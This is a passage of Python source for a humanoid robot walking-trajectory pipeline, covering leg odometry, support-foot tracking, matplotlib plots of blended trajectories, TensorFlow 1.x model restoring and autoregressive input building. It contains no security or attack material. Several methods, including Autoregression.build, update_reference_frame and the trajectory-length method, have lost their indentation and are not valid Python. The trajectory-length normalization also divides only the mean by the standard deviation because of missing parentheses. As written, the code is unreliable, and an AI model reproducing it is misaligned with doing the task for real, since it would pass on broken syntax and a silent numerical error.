                                                               base_quaternion: List) -> List:
        """Compute kinematically-feasible base position and update the robot configuration.

        Returns the recomputed base position.
        """
        # Recompute base position by leg odometry
        kinematically_feasible_base_pos = self.compute_base_position_by_leg_odometry()
        # Update the base position in the robot configuration
        self.reset_robot_configuration(joint_positions=joint_positions,
                                       base_position=kinematically_feasible_base_pos,
                                       base_quaternion=base_quaternion)
        # Update the base position in the configuration of the robot visualized in the simulator
        self.reset_visual_robot_configuration(base_position=kinematically_feasible_base_pos)
        return kinematically_feasible_base_pos

    def compute_base_position_by_leg_odometry(self) -> List:
        """Compute kinematically-feasible base position using leg odometry, i.e. the base position
        such that the current support vertex remains fixed while the robot configuration changes."""
        # Get the base (B) position in the world (W) frame
        W_pos_B = self.kindyn.get_world_base_transform()[0:3, -1]
        # Get the support vertex position in the world (W) frame
        W_support_vertex_pos = self.support_vertex_pos
        # Get the support vertex orientation in the world (W) frame, defined as the support foot (SF) orientation
        world_H_base = self.kindyn.get_world_base_transform()
        base_H_SF = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
        W_H_SF = world_H_base.dot(base_H_SF)
        W_support_vertex_quat = Quaternion.from_matrix(W_H_SF[0:3, 0:3])
        # Compute the transform of the support vertex (SV) in the world (W) frame
        W_H_SV = Transform.from_position_and_quaternion(position=np.asarray(W_support_vertex_pos),
                                                        quaternion=np.asarray(W_support_vertex_quat))
        # Express the base (B) position in the support vertex (SV) reference frame
        SV_H_W = np.linalg.inv(W_H_SV)
        W_pos_B_hom = np.concatenate((W_pos_B, [1]))
        SV_pos_B_hom = SV_H_W @ W_pos_B_hom
        # Express the base (B) position in a reference frame oriented as the world but positioned in the support vertex (SV)
        mixed_H_SV = Transform.from_position_and_quaternion(position=np.asarray([0, 0, 0]),
                                                            quaternion=np.asarray(W_support_vertex_quat))
        mixed_pos_B_hom = mixed_H_SV @ SV_pos_B_hom
        # Convert homogeneous to cartesian coordinates
        mixed_pos_B = mixed_pos_B_hom[0:3]
        # Compute the kinematically-feasible base position, i.e. the base position such that the support
        # vertex remains fixed while the robot configuration changes
        kinematically_feasible_base_position = mixed_pos_B + self.support_vertex_offset
        return kinematically_feasible_base_position

    def update_support_vertex_and_support_foot(self) -> (str, bool, bool):
        """Update the support vertex and the support foot. Also, return boolean variables indicating whether the
        deactivation time of the last footstep needs to be updated (update_footstep_deactivation_time) and whether
        a new footstep needs to be added to the footsteps list (update_footsteps_list)."""
        update_footsteps_list = False
        # Associate feet vertices names to indexes (must match the ordering of compute_W_vertices_pos)
        vertex_indexes_to_names = {0: "RFL", 1: "RFR", 2: "RBL", 3: "RBR",
                                   4: "LFL", 5: "LFR", 6: "LBL", 7: "LBR"}
        # Retrieve the vertices positions in the world frame
        W_vertices_positions = self.compute_W_vertices_pos()
        # Compute the current support vertex: the lowest vertex of either foot
        vertices_heights = [W_vertex[2] for W_vertex in W_vertices_positions]
        self.support_vertex = np.argmin(vertices_heights)
        # Check whether the deactivation time of the last footstep needs to be updated
        update_footstep_deactivation_time = self.footsteps_extractor.should_update_footstep_deactivation_time(kindyn=self.kindyn)
        # If the support vertex did not change
        if self.support_vertex == self.support_vertex_prev:
            # Update support foot position and support vertex position
            world_H_base = self.kindyn.get_world_base_transform()
            base_H_support_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
            W_H_SF = world_H_base.dot(base_H_support_foot)
            self.support_foot_pos = W_H_SF[0:3, -1]
            self.support_vertex_pos = W_vertices_positions[self.support_vertex]
        # If the support vertex changed
        else:
            # Update the support foot: vertex names starting with "R" belong to the right foot
            if vertex_indexes_to_names[self.support_vertex][0] == "R":
                self.support_foot = "r_foot"
            else:
                self.support_foot = "l_foot"
            # If the support foot changed
            if self.support_foot != self.support_foot_prev:
                # Indicate that a new footstep needs to be added to the footsteps list
                update_footsteps_list = True
                # Update support foot prev
                self.support_foot_prev = self.support_foot
            # Update support foot position and support vertex position
            world_H_base = self.kindyn.get_world_base_transform()
            base_H_support_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
            W_H_SF = world_H_base.dot(base_H_support_foot)
            self.support_foot_pos = W_H_SF[0:3, -1]
            self.support_vertex_pos = W_vertices_positions[self.support_vertex]
            # Update also the vertex offset (ground-plane components only)
            self.support_vertex_offset = [self.support_vertex_pos[0], self.support_vertex_pos[1], 0]
            # Update support vertex prev
            self.support_vertex_prev = self.support_vertex
        return self.support_foot, update_footstep_deactivation_time, update_footsteps_list
@dataclass
class Plotter:
    """Class to handle the plots related to the trajectory generation pipeline."""

    # Axis of the composed ellipsoid constraining the last point of the Bezier curve of base positions
    ellipsoid_forward_axis: float
    ellipsoid_side_axis: float
    ellipsoid_backward_axis: float
    # Scaling factor for all the axes of the composed ellipsoid
    ellipsoid_scaling: float

    @staticmethod
    def build(ellipsoid_forward_axis: float = 1.0,
              ellipsoid_side_axis: float = 0.9,
              ellipsoid_backward_axis: float = 0.6,
              ellipsoid_scaling: float = 0.4) -> "Plotter":
        """Build an instance of Plotter."""
        return Plotter(ellipsoid_forward_axis=ellipsoid_forward_axis,
                       ellipsoid_side_axis=ellipsoid_side_axis,
                       ellipsoid_backward_axis=ellipsoid_backward_axis,
                       ellipsoid_scaling=ellipsoid_scaling)

    @staticmethod
    def plot_blending_coefficients(figure_blending_coefficients: int, blending_coeffs: Dict) -> None:
        """Plot the activations of the blending coefficients w_1..w_4."""
        plt.figure(figure_blending_coefficients)
        plt.clf()
        # Plot blending coefficients
        plt.plot(range(len(blending_coeffs["w_1"])), blending_coeffs["w_1"], 'r')
        plt.plot(range(len(blending_coeffs["w_2"])), blending_coeffs["w_2"], 'b')
        plt.plot(range(len(blending_coeffs["w_3"])), blending_coeffs["w_3"], 'g')
        plt.plot(range(len(blending_coeffs["w_4"])), blending_coeffs["w_4"], 'y')
        # Plot configuration
        plt.title("Blending coefficients profiles")
        plt.ylabel("Blending coefficients")
        plt.xlabel("Time [s]")

    @staticmethod
    def plot_new_footstep(figure_footsteps: int, support_foot: str, new_footstep: Dict) -> None:
        """Plot a new footstep just added to the footsteps list."""
        plt.figure(figure_footsteps)
        # Plot left footsteps in blue, right footsteps in red
        colors = {"l_foot": 'b', "r_foot": 'r'}
        # Footstep position
        plt.scatter(new_footstep["2D_pos"][1], -new_footstep["2D_pos"][0], c=colors[support_foot])
        # Footstep orientation (scaled for visualization purposes)
        plt.plot([new_footstep["2D_pos"][1], new_footstep["2D_pos"][1] + math.sin(new_footstep["2D_orient"]) / 10],
                 [-new_footstep["2D_pos"][0], -new_footstep["2D_pos"][0] - math.cos(new_footstep["2D_orient"]) / 10],
                 colors[support_foot])
        # Plot configuration
        plt.axis('scaled')
        plt.xlim([-6, 6])
        plt.ylim([-6, 6])
        plt.title("Footsteps")

    @staticmethod
    def plot_predicted_future_trajectory(figure_facing_dirs: int, figure_base_vel: int, denormalized_current_output: List) -> None:
        """Plot the future trajectory predicted by the network (magenta)."""
        # Retrieve predicted base positions, facing directions and base velocities from the denormalized network output
        predicted_base_pos = denormalized_current_output[0:12]
        predicted_facing_dirs = denormalized_current_output[12:24]
        predicted_base_vel = denormalized_current_output[24:36]
        plt.figure(figure_facing_dirs)
        for k in range(0, len(predicted_base_pos), 2):
            # Plot base positions
            base_position = [predicted_base_pos[k], predicted_base_pos[k + 1]]
            plt.scatter(-base_position[1], base_position[0], c='m')
            # Plot facing directions (scaled for visualization purposes)
            facing_direction = [predicted_facing_dirs[k] / 10, predicted_facing_dirs[k + 1] / 10]
            plt.plot([-base_position[1], -base_position[1] - facing_direction[1]],
                     [base_position[0], base_position[0] + facing_direction[0]],
                     'm')
        plt.figure(figure_base_vel)
        for k in range(0, len(predicted_base_pos), 2):
            # Plot base positions
            base_position = [predicted_base_pos[k], predicted_base_pos[k + 1]]
            plt.scatter(-base_position[1], base_position[0], c='m')
            # Plot base velocities (scaled for visualization purposes)
            base_velocity = [predicted_base_vel[k] / 10, predicted_base_vel[k + 1] / 10]
            plt.plot([-base_position[1], -base_position[1] - base_velocity[1]],
                     [base_position[0], base_position[0] + base_velocity[0]],
                     'm')

    @staticmethod
    def plot_desired_future_trajectory(figure_facing_dirs: int, figure_base_vel: int,
                                       quad_bezier: List, facing_dirs: List, base_velocities: List) -> None:
        """Plot the future trajectory built from user inputs (gray)."""
        # Retrieve components for plotting
        quad_bezier_x = [elem[0] for elem in quad_bezier]
        quad_bezier_y = [elem[1] for elem in quad_bezier]
        plt.figure(figure_facing_dirs)
        # Plot base positions
        plt.scatter(quad_bezier_x, quad_bezier_y, c='gray')
        # Plot facing directions (scaled for visualization purposes)
        for k in range(len(quad_bezier)):
            plt.plot([quad_bezier_x[k], quad_bezier_x[k] + facing_dirs[k][0] / 10],
                     [quad_bezier_y[k], quad_bezier_y[k] + facing_dirs[k][1] / 10],
                     c='gray')
        plt.figure(figure_base_vel)
        # Plot base positions
        plt.scatter(quad_bezier_x, quad_bezier_y, c='gray')
        # Plot base velocities (scaled for visualization purposes)
        for k in range(len(quad_bezier)):
            plt.plot([quad_bezier_x[k], quad_bezier_x[k] + base_velocities[k][0] / 10],
                     [quad_bezier_y[k], quad_bezier_y[k] + base_velocities[k][1] / 10],
                     c='gray')

    @staticmethod
    def plot_blended_future_trajectory(figure_facing_dirs: int, figure_base_vel: int, blended_base_positions: List,
                                       blended_facing_dirs: List, blended_base_velocities: List) -> None:
        """Plot the future trajectory obtained by blending the network output and the user input (green)."""
        # Extract components for plotting
        blended_base_positions_x = [elem[0] for elem in blended_base_positions]
        blended_base_positions_y = [elem[1] for elem in blended_base_positions]
        plt.figure(figure_facing_dirs)
        # Plot base positions
        plt.scatter(blended_base_positions_x, blended_base_positions_y, c='g')
        # Plot facing directions (scaled for visualization purposes)
        for k in range(len(blended_base_positions)):
            plt.plot([blended_base_positions_x[k], blended_base_positions_x[k] + blended_facing_dirs[k][0] / 10],
                     [blended_base_positions_y[k], blended_base_positions_y[k] + blended_facing_dirs[k][1] / 10],
                     c='g')
        plt.figure(figure_base_vel)
        # Plot base positions
        plt.scatter(blended_base_positions_x, blended_base_positions_y, c='g')
        # Plot base velocities (scaled for visualization purposes)
        for k in range(len(blended_base_positions)):
            plt.plot([blended_base_positions_x[k], blended_base_positions_x[k] + blended_base_velocities[k][0] / 10],
                     [blended_base_positions_y[k], blended_base_positions_y[k] + blended_base_velocities[k][1] / 10],
                     c='g')

    def _prepare_trajectory_figure(self, figure: int) -> None:
        """Clear the given figure, then plot the local reference frame and the boundary of the composed
        ellipsoid on which the last point of the Bezier curve of base positions is constrained.

        Extracted helper: this block was previously duplicated four times inside plot_trajectory_blending.
        """
        plt.figure(figure)
        plt.clf()
        # Plot the reference frame (origin plus a short segment along the forward direction)
        plt.scatter(0, 0, c='k')
        plt.plot([0, 0], [0, 1 / 10], 'k')
        # Both semi-ellipses share the (scaled) side axis
        a = self.ellipsoid_side_axis * self.ellipsoid_scaling
        x_coord = np.linspace(-a, a, 1000)
        # Upper semi-ellipse, bounded by the forward axis
        b = self.ellipsoid_forward_axis * self.ellipsoid_scaling
        y_coord = b * np.sqrt(1 - (x_coord ** 2) / (a ** 2))
        plt.plot(x_coord, y_coord, 'k')
        # Lower semi-ellipse, bounded by the backward axis
        b = self.ellipsoid_backward_axis * self.ellipsoid_scaling
        y_coord = b * np.sqrt(1 - (x_coord ** 2) / (a ** 2))
        plt.plot(x_coord, -y_coord, 'k')

    def plot_trajectory_blending(self, figure_facing_dirs: int, figure_base_vel: int, denormalized_current_output: List,
                                 quad_bezier: List, facing_dirs: List, base_velocities: List, blended_base_positions: List,
                                 blended_facing_dirs: List, blended_base_velocities: List) -> None:
        """Plot the predicted, desired and blended future ground trajectories used to build the next network input."""
        # Prepare both figures (reference frame + composed ellipsoid boundary)
        self._prepare_trajectory_figure(figure_facing_dirs)
        self._prepare_trajectory_figure(figure_base_vel)
        # Plot the future trajectory predicted by the network
        self.plot_predicted_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
                                              denormalized_current_output=denormalized_current_output)
        # Plot the future trajectory built from user inputs
        self.plot_desired_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
                                            quad_bezier=quad_bezier, facing_dirs=facing_dirs, base_velocities=base_velocities)
        # Plot the future trajectory obtained by blending the network output and the user input
        self.plot_blended_future_trajectory(figure_facing_dirs=figure_facing_dirs, figure_base_vel=figure_base_vel,
                                            blended_base_positions=blended_base_positions,
                                            blended_facing_dirs=blended_facing_dirs,
                                            blended_base_velocities=blended_base_velocities)
        # Configure facing directions plot
        plt.figure(figure_facing_dirs)
        plt.axis('scaled')
        plt.xlim([-0.5, 0.5])
        plt.ylim([-0.3, 0.5])
        plt.axis('off')
        plt.title("INTERPOLATED TRAJECTORY (FACING DIRECTIONS)")
        # Configure base velocities plot
        plt.figure(figure_base_vel)
        plt.axis('scaled')
        plt.xlim([-0.5, 0.5])
        plt.ylim([-0.3, 0.5])
        plt.axis('off')
        plt.title("INTERPOLATED TRAJECTORY (BASE VELOCITIES)")
@dataclass
class LearnedModel:
    """Class for the direct exploitation of the model learned during training."""

    # Path to the learned model
    model_path: str
    # Output mean and standard deviation
    Ymean: List
    Ystd: List

    @staticmethod
    def build(training_path: str) -> "LearnedModel":
        """Build an instance of LearnedModel.

        The training folder is expected to contain "model/" (TensorFlow checkpoint) and
        "normalization/" (output statistics) — assumed from the paths below, confirm upstream.
        """
        # Retrieve path to the learned model
        model_path = os.path.join(training_path, "model/")
        # Compute output mean and standard deviation
        datapath = os.path.join(training_path, "normalization/")
        Ymean, Ystd = load_output_mean_and_std(datapath)
        return LearnedModel(model_path=model_path, Ymean=Ymean, Ystd=Ystd)

    def restore_learned_model(self, session: tf.Session) -> tf.Graph:
        """Restore the learned model (TensorFlow 1.x checkpoint) into the given session and return its graph."""
        # Restore the network generator
        saver = tf.train.import_meta_graph(self.model_path + "/model.ckpt.meta")
        saver.restore(session, tf.train.latest_checkpoint(self.model_path))
        # Retrieve the graph
        graph = tf.get_default_graph()
        return graph

    @staticmethod
    def retrieve_tensors(graph: tf.Graph) -> (tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor):
        """Retrieve the tensors associated to the quantities of interest."""
        # Placeholder to feed the input X
        nn_X = graph.get_tensor_by_name("nn_X:0")
        # Placeholder to feed the dropout probability
        nn_keep_prob = graph.get_tensor_by_name("nn_keep_prob:0")
        # Tensor containing the network output
        # NOTE(review): 'Squeeze:0' and 'Softmax:0' are auto-generated op names tied to
        # the graph structure at training time — brittle if the model architecture changes
        output = graph.get_tensor_by_name('Squeeze:0')
        # Tensor containing the blending coefficients
        blending_coefficients = graph.get_tensor_by_name('Softmax:0')
        return nn_X, nn_keep_prob, output, blending_coefficients

    @staticmethod
    def evaluate_tensors(nn_X: tf.Tensor, current_nn_X: List, nn_keep_prob: tf.Tensor, output: tf.Tensor,
                         blending_coefficients: tf.Tensor) -> (np.array, np.array):
        """Evaluate the tensors associated to the quantities of interest.

        Requires a default TF session to be active (tensor.eval relies on it).
        """
        # Pass the input defined at the previous iteration to the network (no dropout at inference time)
        feed_dict = {nn_X: current_nn_X, nn_keep_prob: 1.0}
        # Extract the output from the network
        current_output = output.eval(feed_dict=feed_dict)
        # Extract the blending coefficients from the network
        current_blending_coefficients = blending_coefficients.eval(feed_dict=feed_dict)
        return current_output, current_blending_coefficients
@dataclass
class Autoregression:
    """Class to use the network output, blended with the user-specified input, in an autoregressive fashion."""

    # Component-wise input mean and standard deviation
    Xmean_dict: Dict
    Xstd_dict: Dict
    # Robot-specific frontal base and chest directions
    frontal_base_direction: List
    frontal_chest_direction: List
    # Predefined norm for the base velocities
    base_vel_norm: float
    # Blending parameters tau (one per blended quantity)
    tau_base_positions: float
    tau_facing_dirs: float
    tau_base_velocities: float
    # Auxiliary variable to handle unnatural in-place rotations when the robot is stopped
    nn_X_difference_norm_threshold: float
    # Variables to store autoregression-relevant information for the current iteration
    current_nn_X: List
    current_past_trajectory_base_positions: List
    current_past_trajectory_facing_directions: List
    current_past_trajectory_base_velocities: List
    current_base_position: np.array
    current_base_yaw: float
    current_ground_base_position: List = field(default_factory=lambda: [0,0])
    current_facing_direction: List = field(default_factory=lambda: [1,0])
    current_world_R_facing: np.array = field(default_factory=lambda: np.array([[1, 0], [0, 1]]))
    # Variables to store autoregression-relevant information for the next iteration
    next_nn_X: List = field(default_factory=list)
    new_past_trajectory_base_positions: List = field(default_factory=list)
    new_past_trajectory_facing_directions: List = field(default_factory=list)
    new_past_trajectory_base_velocities: List = field(default_factory=list)
    new_base_position: List = field(default_factory=list)
    new_facing_direction: List = field(default_factory=list)
    new_world_R_facing: List = field(default_factory=list)
    new_facing_R_world: List = field(default_factory=list)
    new_ground_base_position: List = field(default_factory=list)
    new_base_yaw: List = field(default_factory=list)
    # Number of points constituting the Bezier curve
    # NOTE(review): t is the curve parameter vector (7 samples in [0, 1]), not a count
    t: List = field(default_factory=lambda: np.linspace(0, 1, 7))
    # Relevant indexes of the window storing past data
    past_window_indexes: List = field(default_factory=lambda: [0, 10, 20, 30, 40, 50])
    # Auxiliary variable for the robot status (moving or stopped)
    stopped: bool = True
@staticmethod
def build(training_path: str,
initial_nn_X: List,
initial_past_trajectory_base_pos: List,
initial_past_trajectory_facing_dirs: List,
initial_past_trajectory_base_vel: List,
initial_base_height: List,
initial_base_yaw: float,
frontal_base_direction: List,
frontal_chest_direction: List,
base_vel_norm: float = 0.4,
tau_base_positions: float = 1.5,
tau_facing_dirs: float = 1.3,
tau_base_velocities: float = 1.3,
nn_X_difference_norm_threshold: float = 0.05) -> "Autoregression":
"""Build an instance of Autoregression."""
# Compute component-wise input mean and standard deviation
datapath = os.path.join(training_path, "normalization/")
Xmean_dict, Xstd_dict = load_component_wise_input_mean_and_std(datapath)
return Autoregression(Xmean_dict=Xmean_dict,
Xstd_dict=Xstd_dict,
frontal_base_direction=frontal_base_direction,
frontal_chest_direction=frontal_chest_direction,
base_vel_norm=base_vel_norm,
tau_base_positions=tau_base_positions,
tau_facing_dirs=tau_facing_dirs,
tau_base_velocities=tau_base_velocities,
nn_X_difference_norm_threshold=nn_X_difference_norm_threshold,
current_nn_X=initial_nn_X,
current_past_trajectory_base_positions=initial_past_trajectory_base_pos,
current_past_trajectory_facing_directions=initial_past_trajectory_facing_dirs,
current_past_trajectory_base_velocities=initial_past_trajectory_base_vel,
current_base_position=np.array([0, 0, initial_base_height]),
current_base_yaw=initial_base_yaw)
def update_reference_frame(self, world_H_base: np.array, base_H_chest: np.array) -> None:
"""Update the local reference frame given by the new base position and the new facing direction."""
# Store new base position
self.new_base_position = world_H_base[0:3, -1]
self.new_ground_base_position = [self.new_base_position[0], self.new_base_position[1]] # projected on the ground
# Retrieve new ground base direction
new_base_rotation = world_H_base[0:3, 0:3]
new_base_direction = new_base_rotation.dot(self.frontal_base_direction)
new_ground_base_direction = [new_base_direction[0], new_base_direction[1]] # projected on the ground
new_ground_base_direction = new_ground_base_direction / np.linalg.norm(new_ground_base_direction) # of unitary norm
# Retrieve new ground chest direction
world_H_chest = world_H_base.dot(base_H_chest)
new_chest_rotation = world_H_chest[0:3, 0:3]
new_chest_direction = new_chest_rotation.dot(self.frontal_chest_direction)
new_ground_chest_direction = [new_chest_direction[0], new_chest_direction[1]] # projected on the ground
new_ground_chest_direction = new_ground_chest_direction / np.linalg.norm(new_ground_chest_direction) # of unitary norm
# Store new facing direction
self.new_facing_direction = new_ground_base_direction + new_ground_chest_direction # mean of base and chest directions
self.new_facing_direction = self.new_facing_direction / np.linalg.norm(self.new_facing_direction) # of unitary norm
# Retrieve the rotation from the new facing direction to the world frame and its inverse
new_facing_direction_yaw = compute_angle_wrt_x_positive_semiaxis(self.new_facing_direction)
self.new_world_R_facing = rotation_2D(new_facing_direction_yaw)
self.new_facing_R_world = np.linalg.inv(self.new_world_R_facing)
    def autoregressive_usage_base_positions(self, next_nn_X: List, denormalized_current_output: np.array,
                                            quad_bezier: List) -> (List, List, List):
        """Use the base positions in an autoregressive fashion.

        Re-expresses the window of past base positions in the new local frame,
        blends the network-predicted future base positions with the
        user-specified Bezier curve and appends both the normalized past and
        blended future base positions to the next network input.

        Returns the updated next input, the blended future base positions (in
        the plot frame) and the denormalized blended features (in the local frame).
        """
        # ===================
        # PAST BASE POSITIONS
        # ===================
        # Update the full window storing the past base positions
        new_past_trajectory_base_positions = []
        for k in range(len(self.current_past_trajectory_base_positions) - 1):
            # Element in the reference frame defined by the previous base position + facing direction
            facing_elem = self.current_past_trajectory_base_positions[k + 1]
            # Express element in world frame
            world_elem = self.current_world_R_facing.dot(facing_elem) + self.current_ground_base_position
            # Express element in the frame defined by the new base position + facing direction
            new_facing_elem = self.new_facing_R_world.dot(world_elem - self.new_ground_base_position)
            # Store updated element
            new_past_trajectory_base_positions.append(new_facing_elem)
        # Add as last element the current (local) base position, i.e. [0,0]
        new_past_trajectory_base_positions.append(np.array([0., 0.]))
        # Update past base positions
        self.new_past_trajectory_base_positions = new_past_trajectory_base_positions
        # Extract compressed window of past base positions (denormalized for plotting)
        past_base_positions_plot = []
        for index in self.past_window_indexes:
            past_base_positions_plot.extend(self.new_past_trajectory_base_positions[index])
        # Extract compressed window of past base positions (normalized for building the next input)
        past_base_positions = past_base_positions_plot.copy()
        for k in range(len(past_base_positions)):
            past_base_positions[k] = (past_base_positions[k] - self.Xmean_dict["past_base_positions"][k]) / \
                                     self.Xstd_dict["past_base_positions"][k]
        # Add the compressed window of normalized past base positions to the next input
        next_nn_X.extend(past_base_positions)
        # =====================
        # FUTURE BASE POSITIONS
        # =====================
        # Extract future base positions for blending (i.e. in the plot reference frame)
        # NOTE(review): the (x, y) -> (-y, x) swap below suggests the plot frame
        # is rotated 90 deg wrt the local frame — confirm against the plotter.
        future_base_pos_plot = denormalized_current_output[0:12]
        future_base_pos_blend = [[0.0, 0.0]]
        for k in range(0, len(future_base_pos_plot), 2):
            future_base_pos_blend.append([-future_base_pos_plot[k + 1], future_base_pos_plot[k]])
        # Blend user-specified and network-predicted future base positions
        blended_base_positions = trajectory_blending(future_base_pos_blend, quad_bezier, self.t, self.tau_base_positions)
        # Reshape blended future base positions (swap back from the plot frame)
        future_base_pos_blend_features = []
        for k in range(1, len(blended_base_positions)):
            future_base_pos_blend_features.append(blended_base_positions[k][1])
            future_base_pos_blend_features.append(-blended_base_positions[k][0])
        # Normalize blended future base positions
        future_base_pos_blend_features_normalized = future_base_pos_blend_features.copy()
        for k in range(len(future_base_pos_blend_features_normalized)):
            future_base_pos_blend_features_normalized[k] = (future_base_pos_blend_features_normalized[k] -
                                                            self.Xmean_dict["future_base_positions"][k]) / \
                                                           self.Xstd_dict["future_base_positions"][k]
        # Add the normalized blended future base positions to the next input
        next_nn_X.extend(future_base_pos_blend_features_normalized)
        return next_nn_X, blended_base_positions, future_base_pos_blend_features
    def autoregressive_usage_facing_directions(self, next_nn_X: List, denormalized_current_output: np.array,
                                               facing_dirs: List) -> (List, List):
        """Use the facing directions in an autoregressive fashion.

        Rotates the window of past facing directions into the new local frame,
        blends the network-predicted future facing directions with the
        user-specified ones and appends both the normalized past and blended
        future facing directions to the next network input.
        """
        # ======================
        # PAST FACING DIRECTIONS
        # ======================
        # Update the full window storing the past facing directions
        new_past_trajectory_facing_directions = []
        for k in range(len(self.current_past_trajectory_facing_directions) - 1):
            # Element in the reference frame defined by the previous base position + facing direction
            facing_elem = self.current_past_trajectory_facing_directions[k + 1]
            # Express element in world frame (directions are rotated only, not translated)
            world_elem = self.current_world_R_facing.dot(facing_elem)
            # Express element in the frame defined by the new base position + facing direction
            new_facing_elem = self.new_facing_R_world.dot(world_elem)
            # Store updated element
            new_past_trajectory_facing_directions.append(new_facing_elem)
        # Add as last element the current (local) facing direction, i.e. [1,0]
        new_past_trajectory_facing_directions.append(np.array([1., 0.]))
        # Update past facing directions
        self.new_past_trajectory_facing_directions = new_past_trajectory_facing_directions
        # Extract compressed window of past facing directions (denormalized for plotting)
        past_facing_directions_plot = []
        for index in self.past_window_indexes:
            past_facing_directions_plot.extend(self.new_past_trajectory_facing_directions[index])
        # Extract compressed window of past facing directions (normalized for building the next input)
        past_facing_directions = past_facing_directions_plot.copy()
        for k in range(len(past_facing_directions)):
            past_facing_directions[k] = (past_facing_directions[k] - self.Xmean_dict["past_facing_directions"][k]) / \
                                        self.Xstd_dict["past_facing_directions"][k]
        # Add the compressed window of normalized past facing directions to the next input
        next_nn_X.extend(past_facing_directions)
        # ========================
        # FUTURE FACING DIRECTIONS
        # ========================
        # Extract future facing directions for blending (i.e. in the plot reference frame)
        future_facing_dirs_plot = denormalized_current_output[12:24]
        # The first blending point is the current facing direction, [1,0] locally,
        # i.e. [0,1] once swapped into the plot frame
        future_facing_dirs_blend = [[0.0, 1.0]]
        for k in range(0, len(future_facing_dirs_plot), 2):
            future_facing_dirs_blend.append([-future_facing_dirs_plot[k + 1], future_facing_dirs_plot[k]])
        # Blend user-specified and network-predicted future facing directions
        blended_facing_dirs = trajectory_blending(future_facing_dirs_blend, facing_dirs, self.t, self.tau_facing_dirs)
        # Reshape blended future facing directions (swap back from the plot frame)
        future_facing_dirs_blend_features = []
        for k in range(1, len(blended_facing_dirs)):
            future_facing_dirs_blend_features.append(blended_facing_dirs[k][1])
            future_facing_dirs_blend_features.append(-blended_facing_dirs[k][0])
        # Normalize blended future facing directions
        future_facing_dirs_blend_features_normalized = future_facing_dirs_blend_features.copy()
        for k in range(len(future_facing_dirs_blend_features_normalized)):
            future_facing_dirs_blend_features_normalized[k] = (future_facing_dirs_blend_features_normalized[k] -
                                                               self.Xmean_dict["future_facing_directions"][k]) / \
                                                              self.Xstd_dict["future_facing_directions"][k]
        # Add the normalized blended future facing directions to the next input
        next_nn_X.extend(future_facing_dirs_blend_features_normalized)
        return next_nn_X, blended_facing_dirs
    def autoregressive_usage_base_velocities(self, next_nn_X: List, denormalized_current_output: np.array,
                                             base_velocities: List) -> (List, List):
        """Use the base velocities in an autoregressive fashion.

        Rotates the window of past base velocities into the new local frame,
        blends the network-predicted future base velocities with the
        user-specified ones and appends both the normalized past and blended
        future base velocities to the next network input.
        """
        # ====================
        # PAST BASE VELOCITIES
        # ====================
        # Update the full window storing the past base velocities
        new_past_trajectory_base_velocities = []
        for k in range(len(self.current_past_trajectory_base_velocities) - 1):
            # Element in the reference frame defined by the previous base position + facing direction
            facing_elem = self.current_past_trajectory_base_velocities[k + 1]
            # Express element in world frame (velocities are rotated only, not translated)
            world_elem = self.current_world_R_facing.dot(facing_elem)
            # Express element in the frame defined by the new base position + facing direction
            new_facing_elem = self.new_facing_R_world.dot(world_elem)
            # Store updated element
            new_past_trajectory_base_velocities.append(new_facing_elem)
        # Add as last element the current (local) base velocity (this is an approximation)
        # taken from the network output at indexes [100:102], rotated by the base yaw
        new_past_trajectory_base_velocities.append(self.new_facing_R_world.dot(rotation_2D(self.new_base_yaw).dot(
            [denormalized_current_output[100], denormalized_current_output[101]])))
        # Update past base velocities
        self.new_past_trajectory_base_velocities = new_past_trajectory_base_velocities
        # Extract compressed window of past base velocities (denormalized for plotting)
        past_base_velocities_plot = []
        for index in self.past_window_indexes:
            past_base_velocities_plot.extend(self.new_past_trajectory_base_velocities[index])
        # Extract compressed window of past base velocities (normalized for building the next input)
        past_base_velocities = past_base_velocities_plot.copy()
        for k in range(len(past_base_velocities)):
            past_base_velocities[k] = (past_base_velocities[k] - self.Xmean_dict["past_base_velocities"][k]) / \
                                      self.Xstd_dict["past_base_velocities"][k]
        # Add the compressed window of normalized past ground base velocities to the next input
        next_nn_X.extend(past_base_velocities)
        # ======================
        # FUTURE BASE VELOCITIES
        # ======================
        # Extract future base velocities for blending (i.e. in the plot reference frame)
        future_base_vel_plot = denormalized_current_output[24:36]
        future_base_vel_blend = [[0.0, self.base_vel_norm]] # This is an approximation.
        for k in range(0, len(future_base_vel_plot), 2):
            future_base_vel_blend.append([-future_base_vel_plot[k + 1], future_base_vel_plot[k]])
        # blend user-specified and network-predicted future base velocities
        blended_base_velocities = trajectory_blending(future_base_vel_blend, base_velocities, self.t, self.tau_base_velocities)
        # Reshape blended future base velocities (swap back from the plot frame)
        future_base_velocities_blend_features = []
        for k in range(1, len(blended_base_velocities)):
            future_base_velocities_blend_features.append(blended_base_velocities[k][1])
            future_base_velocities_blend_features.append(-blended_base_velocities[k][0])
        # Normalize future base velocities
        future_base_velocities_blend_features_normalized = future_base_velocities_blend_features.copy()
        for k in range(len(future_base_velocities_blend_features_normalized)):
            future_base_velocities_blend_features_normalized[k] = (future_base_velocities_blend_features_normalized[k] -
                                                                   self.Xmean_dict["future_base_velocities"][k]) / \
                                                                  self.Xstd_dict["future_base_velocities"][k]
        # Add the normalized blended future base velocities to the next input
        next_nn_X.extend(future_base_velocities_blend_features_normalized)
        return next_nn_X, blended_base_velocities
def autoregressive_usage_future_traj_len(self, next_nn_X: List, future_base_pos_blend_features: List) -> List:
"""Use the future length trajectory in an autoregressive fashion."""
# Compute the desired future trajectory length by summing the distances between future base positions
future_traj_length = 0
future_base_position_prev = future_base_pos_blend_features[0]
for future_base_position in future_base_pos_blend_features[1:]:
base_position_distance = np.linalg.norm(future_base_position - future_base_position_prev)
future_traj_length += base_position_distance
future_base_position_prev = future_base_position
# Normalize the desired future trajectory length
future_traj_length = future_traj_length - self.Xmean_dict["future_traj_length"] / self.Xstd_dict["future_traj_length"]
# Add the desired future trajectory length to the next input
next_nn_X.extend([future_traj_length])
return next_nn_X
def autoregressive_usage_joint_positions_and_velocities(self, next_nn_X: List, current_output: np.array) -> List:
"""Use the joint positions and velocities in an autoregressive fashion."""
# Add the (already normalized) joint positions to the next input
s = current_output[0][36:68]
